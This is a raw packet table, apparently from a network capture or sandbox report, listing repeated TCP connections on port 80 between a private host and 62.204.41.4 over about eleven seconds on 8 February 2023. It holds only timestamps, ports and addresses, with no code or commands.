                            Feb 8, 2023 17:39:38.264810085 CET5017180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.371346951 CET5017180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.372354031 CET5017280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.432913065 CET805017162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:38.432980061 CET805017262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:38.433146000 CET5017280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.433197975 CET5017180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.433748960 CET5017280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.494432926 CET805017262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:38.497771978 CET805017262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:38.497931004 CET5017280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.608875036 CET5017380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.608963013 CET5017280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.669660091 CET805017262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:38.670032978 CET5017280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.670192957 CET805017362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:38.670305014 CET5017380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.673124075 CET5017380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.734477043 CET805017362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:38.736965895 CET805017362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:38.737056017 CET5017380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.839277029 CET5017380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.840332031 CET5017480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.900662899 CET805017462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:38.900729895 CET805017362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:38.900926113 CET5017380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.901010990 CET5017480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.936331034 CET5017480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:38.996661901 CET805017462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:38.999413967 CET805017462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:38.999608994 CET5017480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.356230021 CET5017480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.357182026 CET5017580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.416567087 CET805017462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:39.417747974 CET805017562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:39.418035030 CET5017580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.418989897 CET5017480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.452531099 CET5017580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.513190985 CET805017562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:39.517776012 CET805017562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:39.518449068 CET5017580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.683763027 CET5017580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.684456110 CET5017680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.744411945 CET805017562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:39.744493961 CET5017580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.746788025 CET805017662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:39.747096062 CET5017680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.790671110 CET5017680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.853151083 CET805017662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:39.855304956 CET805017662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:39.856300116 CET5017680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.980483055 CET5017680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:39.981152058 CET5017780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:40.043066978 CET805017762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:40.043190002 CET5017780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:40.043456078 CET805017662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:40.043518066 CET5017680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:40.085026979 CET5017780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:40.149247885 CET805017762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:40.152656078 CET805017762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:40.152827978 CET5017780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:40.758635044 CET5017780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:40.759562016 CET5017880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:40.819039106 CET805017862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:40.819242954 CET5017880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:40.820538998 CET805017762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:40.820672035 CET5017780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:40.855897903 CET5017880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:40.915641069 CET805017862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:40.917797089 CET805017862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:40.917901039 CET5017880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:41.126802921 CET5017880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:41.127558947 CET5017980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:41.186674118 CET805017862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:41.186821938 CET5017880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:41.189177990 CET805017962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:41.189296961 CET5017980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:41.189675093 CET5017980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:41.251254082 CET805017962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:41.253341913 CET805017962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:41.253465891 CET5017980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:41.915579081 CET5017980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:41.925194979 CET5018080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:41.977267027 CET805017962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:41.977368116 CET5017980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:41.986654043 CET805018062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:41.986943960 CET5018080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:42.064683914 CET5018080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:42.126785994 CET805018062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:42.130455017 CET805018062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:42.130630970 CET5018080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:42.744478941 CET5018080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:42.792920113 CET5018180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:42.806221962 CET805018062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:42.806405067 CET5018080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:42.855794907 CET805018162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:42.855983973 CET5018180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:42.912009001 CET5018180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:42.974896908 CET805018162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:42.977669001 CET805018162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:42.977829933 CET5018180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.104470968 CET5018180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.105359077 CET5018280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.164602995 CET805018262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.164832115 CET5018280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.165436029 CET5018280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.167227983 CET805018162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.167373896 CET5018180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.224872112 CET805018262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.227242947 CET805018262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.227447987 CET5018280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.339370012 CET5018280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.340235949 CET5018380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.398752928 CET805018262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.399035931 CET5018280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.401815891 CET805018362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.402096987 CET5018380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.402506113 CET5018380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.464062929 CET805018362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.466197968 CET805018362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.466311932 CET5018380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.580212116 CET5018380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.581362963 CET5018480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.641896963 CET805018362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.642215967 CET5018380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.642843008 CET805018462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.643070936 CET5018480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.643716097 CET5018480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.704361916 CET805018462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.706780910 CET805018462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.707000017 CET5018480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.824985027 CET5018480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.826679945 CET5018580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.885924101 CET805018462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.886085987 CET5018480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.887495995 CET805018562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.887742996 CET5018580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.888645887 CET5018580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:43.949390888 CET805018562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.951951981 CET805018562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:43.952172041 CET5018580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.058765888 CET5018580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.059766054 CET5018680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.119724989 CET805018562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.119951963 CET5018580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.121510983 CET805018662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.121668100 CET5018680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.122139931 CET5018680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.183890104 CET805018662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.186357975 CET805018662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.186640978 CET5018680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.293808937 CET5018680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.294781923 CET5018780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.355619907 CET805018762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.355662107 CET805018662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.355891943 CET5018680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.356708050 CET5018780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.356708050 CET5018780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.418724060 CET805018762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.420044899 CET805018762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.420208931 CET5018780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.527988911 CET5018780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.529082060 CET5018880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.589850903 CET805018762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.589978933 CET5018780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.590831041 CET805018862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.590959072 CET5018880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.592464924 CET5018880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.653985023 CET805018862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.657511950 CET805018862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.657645941 CET5018880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.763525009 CET5018880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.764401913 CET5018980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.825730085 CET805018862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.825936079 CET5018880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.827713013 CET805018962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.827889919 CET5018980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.828385115 CET5018980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.891397953 CET805018962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.893361092 CET805018962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:44.893441916 CET5018980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.995944977 CET5018980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:44.996608019 CET5019080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.058922052 CET805019062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.058984995 CET805018962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.059030056 CET5019080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.059061050 CET5018980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.059725046 CET5019080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.122077942 CET805019062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.125121117 CET805019062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.125195026 CET5019080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.232667923 CET5019080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.233278990 CET5019180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.294827938 CET805019162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.294981956 CET5019180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.295056105 CET805019062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.295135975 CET5019080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.295485973 CET5019180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.356975079 CET805019162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.361520052 CET805019162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.361641884 CET5019180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.466161966 CET5019180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.467025042 CET5019280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.527574062 CET805019262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.527705908 CET5019280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.527759075 CET805019162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.527837992 CET5019180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.528131962 CET5019280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.588639021 CET805019262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.590791941 CET805019262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.590888023 CET5019280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.703002930 CET5019280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.703829050 CET5019380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.763593912 CET805019262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.763686895 CET5019280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.766020060 CET805019362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.766132116 CET5019380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.766475916 CET5019380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.828736067 CET805019362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.831042051 CET805019362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.831290960 CET5019380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.934142113 CET5019380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.935359001 CET5019480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.995081902 CET805019462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.995362997 CET5019480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.996671915 CET805019362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:45.996864080 CET5019380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:45.998769045 CET5019480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.058397055 CET805019462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.060642004 CET805019462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.060858965 CET5019480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.168760061 CET5019480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.169728041 CET5019580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.228543043 CET805019462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.231142998 CET805019562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.231360912 CET5019480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.231370926 CET5019580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.232146025 CET5019580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.293467045 CET805019562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.296885014 CET805019562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.297142982 CET5019580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.408507109 CET5019580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.409218073 CET5019680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.472395897 CET805019562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.473037958 CET805019662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.473200083 CET5019580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.473292112 CET5019680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.473902941 CET5019680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.535478115 CET805019662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.538629055 CET805019662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.538866043 CET5019680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.653119087 CET5019680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.654664993 CET5019780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.715291977 CET805019662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.715514898 CET5019680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.716227055 CET805019762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.716475010 CET5019780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.717262983 CET5019780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.778687000 CET805019762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.781402111 CET805019762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.781860113 CET5019780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.887336016 CET5019780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.888367891 CET5019880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.949085951 CET805019762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.949706078 CET805019862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:46.949786901 CET5019780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.949831009 CET5019880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:46.952790022 CET5019880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.014290094 CET805019862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.017493963 CET805019862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.017657995 CET5019880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.122945070 CET5019880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.131688118 CET5019980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.184360981 CET805019862.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.184462070 CET5019880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.192120075 CET805019962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.192286015 CET5019980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.192794085 CET5019980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.253279924 CET805019962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.256427050 CET805019962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.256581068 CET5019980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.373799086 CET5019980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.374653101 CET5020080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.434559107 CET805019962.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.434726954 CET5019980192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.436222076 CET805020062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.436403036 CET5020080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.437016010 CET5020080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.498363018 CET805020062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.501085997 CET805020062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.501245022 CET5020080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.605616093 CET5020080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.606726885 CET5020180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.667041063 CET805020062.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.667165995 CET5020080192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.668951035 CET805020162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.669159889 CET5020180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.669673920 CET5020180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.731951952 CET805020162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.734966993 CET805020162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.735490084 CET5020180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.839858055 CET5020180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.840893984 CET5020280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.902317047 CET805020162.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.902405024 CET5020180192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.903100967 CET805020262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.903224945 CET5020280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.905015945 CET5020280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:47.967370987 CET805020262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.970180035 CET805020262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:47.970257998 CET5020280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.074259043 CET5020280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.074949026 CET5020380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.136267900 CET805020362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.136399031 CET5020380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.136538982 CET805020262.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.136636019 CET5020280192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.140899897 CET5020380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.202277899 CET805020362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.205348015 CET805020362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.205452919 CET5020380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.309823036 CET5020380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.310686111 CET5020480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.371309996 CET805020362.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.371432066 CET5020380192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.372107983 CET805020462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.372224092 CET5020480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.373919010 CET5020480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.435372114 CET805020462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.437956095 CET805020462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.438045025 CET5020480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.547785044 CET5020480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.548793077 CET5020580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.609546900 CET805020462.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.609606028 CET5020480192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.610960960 CET805020562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.611046076 CET5020580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.611499071 CET5020580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.673640966 CET805020562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.676002026 CET805020562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.676101923 CET5020580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.798872948 CET5020580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.799658060 CET5020680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.861340046 CET805020662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.861366987 CET805020562.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.861507893 CET5020580192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.861525059 CET5020680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.861881971 CET5020680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:48.923405886 CET805020662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.925546885 CET805020662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:48.925721884 CET5020680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:49.027740002 CET5020680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:49.028727055 CET5020780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:49.089575052 CET805020662.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:49.090104103 CET5020680192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:49.090935946 CET805020762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:49.091094017 CET5020780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:49.091510057 CET5020780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:49.153512001 CET805020762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:49.157483101 CET805020762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:49.158585072 CET5020780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:49.262479067 CET5020780192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:49.263343096 CET5020880192.168.2.462.204.41.4
                            Feb 8, 2023 17:39:49.325098038 CET805020762.204.41.4192.168.2.4
                            Feb 8, 2023 17:39:49.325740099 CET805020862.204.41.4192.168.2.4
